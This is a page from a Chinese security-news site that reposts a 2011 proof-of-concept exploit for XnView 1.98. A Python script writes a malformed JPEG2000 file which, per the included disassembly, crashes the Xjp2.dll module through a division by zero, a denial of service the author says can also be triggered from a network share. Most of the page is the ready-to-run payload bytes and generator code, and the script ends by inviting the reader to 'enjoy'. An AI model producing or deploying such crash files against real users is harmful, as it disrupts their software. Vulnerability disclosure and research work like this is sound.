首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
XnView 1.98 Denial of Service Vulnerability PoC
来源:vfocus.net 作者:BraniX 发布时间:2011-06-21  

# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe    MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll      MD5: 0c831c090f5a723d44bb641b175ca0e6

# DoS is caused by integer division by zero in module Xjp2.dll

# It can be triggered from:
# Local: C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \\MySecretServer\XnView 1.98 JP2000 (Compression 50%) DoS.jp2

# 1000D1C4    8A44BA 03       MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8    8941 E4         MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB    8B56 0C         MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE    8D4413 FF       LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2    33D2            XOR EDX,EDX
# 1000D1D4    F7F3            DIV EBX                                  ; div by zero
# 1000D1D6    33D2            XOR EDX,EDX
# 1000D1D8    8BE8            MOV EBP,EAX
# 1000D1DA    8B46 04         MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD    8D4403 FF       LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1    F7F3            DIV EBX
# 1000D1E3    8B59 E4         MOV EBX,DWORD PTR DS:[ECX-1C]

filepath = "C:\\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")
poc = '\x00\x00\x00\x0C\x6A\x50\x20\x20\x0D\x0A\x87\x0A\x00\x00\x00\x14\x66\x74\x79\x70\x6A\x70\x32\x20\x00\x00\x00\x00\x6A\x70\x32\x20\x00\x00\x00\x2D\x6A\x70\x32\x68\x00\x00\x00\x16\x69\x68\x64\x72\x00\x00\x00\x0D\x00\x00\x00\x0B\x00\x03\x07\x07\x00\x00\x00\x00\x00\x0F\x63\x6F\x6C\x72\x01\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x6A\x70\x32\x63\xFF\x4F\xFF\x51\x00\x2F\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x07\x00\x00\x07\x01\x01\x07\x01\x01\xFF\x5C\x00\x17\x42\x60\xC8\x42\x5D\x42\x5D\x42\x6D\x3A\xDB\x3A\xDB\x3B\x35\x32\xB8\x32\xB8\x32\x6B\xFF\x5D\x00\x18\x01\x42\x60\x6D\x41\xF2\x41\xF2\x42\x01\x3A\x6B\x3A\x6B\x3A\xC1\x32\x49\x32\x49\x31\xFF\xFF\x5D\x00\x18\x02\x42\x61\xAA\x43\x69\x43\x69\x43\x7A\x3B\xF3\x3B\xF3\x3C\x56\x33\xCC\x33\xCC\x33\x78\xFF\x52\x00\x0C\x00\x00\x00\x01\x01\x03\x04\x04\x00\x00\xFF\x64\x00\x0F\x00\x01\x4C\x57\x46\x5F\x4A\x50\x32\x5F\x32\x30\x37\xFF\x90\x00\x0A\x00\x00\x00\x00\x00\xA7\x00\x01\xFF\x93\xC7\xEC\x0C\x08\x8A\xC1\xC5\xD6\x54\xC0\x7D\x40\xA0\x0B\xBF\x3B\x6F\xDF\xC1\xF8\x02\x80\x03\x97\x3D\x32\x8B\xC0\xF8\x42\x87\xCE\x12\x07\xC2\x10\x01\x7F\x0C\x31\x03\x6B\x0B\xE3\xA0\x10\x80\x01\xC0\x74\x18\x1F\x08\x60\x04\x0C\x41\x6F\xC3\xE4\x13\x07\xC2\x34\x1F\x08\x80\x1C\xDD\xFD\x75\xB0\xA9\x74\x39\x3F\x0D\x31\x97\xD9\xD9\x7F\x0C\xAC\xCD\x9F\xC0\xE8\x60\x1F\x92\xE7\xC0\xE8\xB0\x3A\x1C\x04\x40\x1F\x1E\xA0\x20\x67\x12\x9A\x3F\x0C\xA7\xC3\xE1\x2A\x0E\x93\x07\x45\x61\x1C\x5E\xC3\xDD\xAC\x1B\xF5\x5B\xB9\x03\x8A\xAD\xF5\x07\x1F\x86\x1D\x5F\x19\xD8\x05\x13\xA3\xC0\x84\x5F\xC0\x8A\x04\x80\x01\x7F\x03\x9C\x46\xBF\xFF\xD9'
f.write(poc)
f.close()

print "Done, 1 file generated on 'C:\\' ..."
print "Open this file in XnView 1.98 and enjoy ;)"


   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DATAC RealWin SCADA Server 2 O
·DreamBox DM800 Arbitrary File
·Black Ice Fax Voice SDK v12.6
·Jaangle v0.98.971 (.ogg) Local
·Black Ice Cover Page SDK insec
·FreeBSD/x86 Alphanumeric Bomb
·MS11-050 IE mshtml!CObjectElem
·OpenBSD/x86 Execve ("/bin/sh")
·SmartFTP Saved Password Extrac
·Gogago YouTube Video Converter
·Internet Explorer6 空指针访问
·MS HyperV Persistent DoS Vulne
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved